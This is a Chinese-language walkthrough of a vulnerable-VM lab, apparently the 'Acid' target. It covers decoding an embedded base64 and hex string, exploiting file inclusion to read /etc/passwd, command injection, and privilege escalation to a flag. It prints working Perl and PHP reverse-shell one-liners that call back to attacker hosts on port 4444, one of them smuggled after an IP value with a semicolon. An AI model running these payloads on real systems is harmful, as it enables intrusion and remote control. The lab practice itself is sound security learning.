eJZjo4SovM6OJ9NImHMU0q+X80YZO8Xzw2gWQAVePkyvzLEAf1TEwlk+xzA4l2EzlUGANCVjEtLv7/0dC8Q1AHQAeAELhwcHSlQ79nPiIge7SEAIdbqxCqHEjGx0HDgUwEoAaxyU2GPQq0CKjkx4kCmJBICJHyZr+NqPIwBNGAJgGDzm2gBlgQrImPnRcYHgkQIMVO25CjerS2xWdt2z2AFEswAiWS3zMaJBOQIUY4qKi3XitVwA8A2bctFfJQJImPE7MquUBY9q+QPMCEHAlgleOMqQRiYCjSaFPRxScKOp3sj+F0BQMIQEVhbcjDpf0oOFgLIUXZymjrhYD8ZABRgzcuMljw6EBKZbsOGFAzh0QOAqnDq6sCi8xiC9AvYGSCAIZSnJw6JzvgYodwIVjd3XjwSEBmAO0gAoDDBEJOXzciIAPwAANM35mj9+KBfkrCXj9ghpnqUEeLlgTARlN8hHoyg4csCUWACFEtUEvA5xgAgGfCDD+wQvwFZihIzNM1JoQBNQAFQ/LDWFAUtAU0EEN12nYohsuDXAIAkMgl1wdYhTAGwALpCCZiz++4UcvAgghQF03rbDekBFcCKSTe7BgRBizUIBWB59ccUV77z3ZJRs70IaFlCygBQEtWCRQwmJespkGDeiIUdADGG7Ug05DTuDCaW3yCdEudsyiDVQzYImKKn0iGsVaRAjmy54clXAmASXQmagUN1SKHQs3tjaECWllwJYDsVm6RgEPcJACDY+itoMGSjbA6kalHFKBj6Vy0QsBDWhQggxPCScDZpUMcUJaPMx4yAaZ4upEOq0pYIEIL/xG2QnkUeRTWjhge8QHzar+cYIGDsAETVsSeLCCDcwCtIMhSoHSFwymBFACuGvwYEMKHUSw27MAnLoBCqvaRMOwvTjAYkknQCOAoPeugV4LIFBw378DNJCBr8AidK1jZPYFAjQEgAzxHjrAQAIGDHT7oAIXjBDDrc3sECo+Eyhcks1ZFvCCyZDwQAMKGzwQT8MJUBCCC9U2cxhF7Dnnl3q9NPfzJj3YsIIH/ToWxgETfNAC06/4YIJ0AGwwWQ8MfLJAiFa34gMOLlDsyb8GROABC3yxsuglBazZFw86ZRnBgHDDksMLIligwNlEFABBB+rmzMYKRgPw7WQ6GB3ABRwjrowOMqjMwOOnSE45Hzr+ZJDlHTNDVcPZB4VODg8ymJBBAy1DjuoKfKvhQwtSEqEZZTC4PscItf+zg9AZsHx3BB2wEDgXrLvuKGpJYhHAp8wjFJq4u0v/QfVS+HA5WypUXhPDFDkMfklBo6AB+c8eQIEIMPiIHjaWSAB0fiEBNGwjP9nQ4ATQ491jMGCCGWyBByLoFgGihpoQ4GMAJTvgTXYwAxNgYAEMHIADOBACxIgBBO2ziQegYQCfcbAvOyBdBRLQtXQ4wHqUwcDTEgCXGFJGBy8AQb+eNQcJlIAG7KrJ/47AAHoAMTXoUcEG7ldA3+kwKmbCguGimB0clCIwp8vfCGQgK4CszRQVOKP+1Xqwwg6uQAUoiAENVOCBBnQNYxv4HVY6dAQLsPFnCnCABC7QARGcYAUvmEEOAlkTH7yAA9FLhwEmIIJfbQRZ0MDAEk32rwAMoAAJcAAFOECCFcjsjWik4YzGwgANqIBU/tjBRyiSAVXeiwUoEAEHLCABCBAvHSFpQAU8kAKZ9SUHLOCAAxhoAArEzJGb2IG/wrABXMKtEwCoAAxYcAIPVOABCeDdAR6wARPAYGxYoUEJKtDKhjFgj4dbxg6EIIe0eXEJMcCDBG6VrxaYoAMUaEC5iuAADIygBeuCSg5c4IEHMPAAFUgiNt3AObZcM58/mIER1tiHB1jyAgQtIAP+KhACFiy0JqExwQVsmA4CQAAEMRCgJLj1NA5otAbomEAgdRABBwyoBzdwQQk0AIE7tWYB0lpaRXGhA4c+oKBHWIAGVjBPSMiuEgEQhBd1CgCi9MEBDYDiE3QQAxKAoZoVacAFRMCCGkhzOOykAFKZYwEUyNIRWcUCToEIA4kAwAI0fcJJGJBXKHQAAIqRgbiKVsAFgE0FMxhsOW5AxQU8rgATGAGX+ECDRmWJqzEUAC8MoAI2GiyHXCBgAX64BMWRwKi1jIkEOIACGcCuGjuAAQggwLsBPAAEnW3DZ6EhWg6a4pn7G2wnIpDbJbQADN+LwujseAACdCsACIiAbSf++4/QkIACwWwNBEZAgzbsdSmaiyEAMBCDE1zgnV876ZpegAAKUJYJNJiRBtLQAYfVYAUgqIAI2bLdDtz2ubi4QQowcDBERIAE501DVuWwXg5qoB88iIEIJkA8AjjgAgVQ7RRwgBIIBBIHEkBbE7DGghBUQAHZPQAEzsm/cuigBRp48CkmcIIsPuEGMcLChQ9IJyGKoGIxkdwcdVAYnwJAAYeFgrAAcAFZ9SDAMMZcEWp82/y6QgcsyACPi3CBFTxXBwVJoUalkFgL2K9bBSBmCFQAAxpQ4gATnoIKhIABaYIAASZoQQgssICCIgBdK6hBJx8h5gwAaAgK2ICeyir+kqVcpc0tRhDt0OMCxo0UC+RpACJXAAMbWMcJImhIGuwhAGOBxgYtEAGBpTMABliABC9QcCR0oIILjDcADgjBnpVATYoEINOaVgIPKMGgJxACBijwAAVOF5gDLOABFMjAB0hwARrpwI1ceME4VyAFHgT4AxOwGxHw1gEVKFEZODDBBApaAAqoIBk9eHAAaLfsH+RAPcs7gweuAAKAeuACEViAAazNHgMggAERoMAGRGACFbiAkT2Q4AAWUGwuzDB35BqSUnXN60bQQAQPOFsCOCADH0xNDMdt80kAYC+CD0HZSvCB817AghRkgBcCaADDGRgGAyzgOx3I+Bl3oEP+iYFg3dBAQAVIIINGt6EHMOAAjxMxGjnMXH7AmcGMpjuFFmaOCzNACQJW4gMe3EAGLlDBCUSggQpAoAEWMxeNNeaCw/qgAkW2C+4yMPIwLCADKCArK3xdgfF2r68xbMAe63uA+J0hsQbhwgqMsAALTkF9GCgBByjggPGSMFWqCIEDGI++G6xgA6YjAkxFMNxN2EAEo1lPsqNIewlswAAaFAWC0j4FFICh9XAQggiYcJQZpAAEFmAATAiA2Q9gfecJvMCDGyDT7KeBBy0ANjQSkIK4Niv2kySIBlLg+hY7yPhSGMEVzIMGE8zh5lFADwvUTTwFcECTsAEPwECHxQP+A3xADDTVGbyJKQCAA5gAmMENggzAOw1ABIQADJxFD7wKAOjcE4jMNkngEjwD5qFBD0CAA4AAd0haCExZGuDAMuHRECxAAoIfF7SQAqiVL4zAyYEL/SEADOwAVHWGAmSACixGD/DQgkyBD6BdBnRSCd6GGoCAAUxYDZRAvbHHBbzAAv6AD9CACUgAedTg+0EJAAjCC1xAuSjATDAPBiUA6I3CCVjAOxVABazYAOhfFGgeB7zRMwyACqyBCwyA2T3HCmQAAhDAA5jAVbGBDZhABFyBFUKCDlTAFG5UByBVAogAkIHLB+zIxzEBD7xACEhAPBiACaTUE6BdB7zRCQQogABgIhrkgAJUwLm9QAZAXAc4IhvUwEO5liMAxw2AAIAkAAi8IK4EAQA7Mzc6NjE6NjU6NjU6MzA6NjY6MzY6NjQ6MzU6Mzg6Mzg6NjU6NjQ6Mzk6Mzk6MzA6MzU6NjU6NjU6MzM6Mzc6NjY6MzE6MzY6NjE6Mzc6NjM6MzY6MzE6MzA6NjQ6MzQ= |
好吧,我沙雕了。。。这个就是wow图片的代码。。。但是解密后发现最下面有一行奇怪的代码
37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34 |
数字比较长,各种编码测试一波,用hex格式还原成了一串md5格式的字符串
7aee0f6d588ed9905ee37f16a7c610d4 |
目录
images
Challenge
css
js
style
Challenge\includes\
根据扫描出来的目录下的文件逐个测试,未发现存在sql注入漏洞。
测试其他页面发现\Magic_Box目录,
测试include页面存在文件读取漏洞,可读取密码文件
root:x:0:0:root:/root:/bin/bash |
查看用户ID大于1000的账户
acid samanid都大于1000
爆破了Magic_Box目录
发现porc目录
low.php 为空
command.php 发现命令行界面
执行id命令成功
0x02 反弹shell
使用如下命令成功反弹shell,其他方法都测试失败
192.168.190.130;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.190.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' |
python -c 'import pty;pty.spawn("/bin/bash")' 反弹一个回显终端 |
0x03 提升权限
查找各用户文件 find / -user acid 2>/dev/null |
发现流量包
但是没办法复制到本机,尝试使用python搭建一个HTTP服务
cd到/sbin/raw_vs_isi/目录,然后输入
python -m SimpleHTTPServer 8080 |
访问8080端口
查看tcp,发现了saman账户密码
saman:1337ha x0r |
好吧,不知道为啥无法使用su命令提升权限
重新尝试一下命令可以成功获取反弹的shell,也可以获取回显终端,但还是无法提升权限。。提示在试一次???我TM的。。。
php -r '$sock=fsockopen("192.168.175.134",4444);exec("/bin/sh -i <&3 >&3 2>&3");' |
上头了
直接用sudo -i saman sudo -i su 三个命令。。。出现了问题 |
目录下存在flag.txt文件
通关!!!
0x04 总结
出现的问题:
1、第一个卡住的点是在Magic_Box目录,当时用dirbuster一直扫描不出来目录,御剑啥的都上了,虽然最后扫描出来了,也卡了半天。
2、在就是对linux的反弹shell这里,跟着靶场中需要payload需要编码后执行,我编码后shell一直不反弹,最后用了perl反弹方法,回显端用的还是前几次的python。
3、第三个是提权这里。。因为没仔细看靶场中的内容(不应该边看亲爱的热爱的,边做靶场。。。),导致以为su命令无法使用,在反弹shell这里重新用了靶场中的代码,可以成功反弹回来,上次无法反弹应该是编码的问题(但是其他靶场文章里面貌似大部分都是编码过的)。
总结:
技术上面盲区还是有点多,虽然做了几个靶场,也有一些思路,值得庆幸的是Acid靶场第一个卡住的点是在目录爆破这里,之前都是个人独立完成的,算是进步了不少,以后还是要多做靶场,好好学习,天天向上,追剧看来得结束了。。。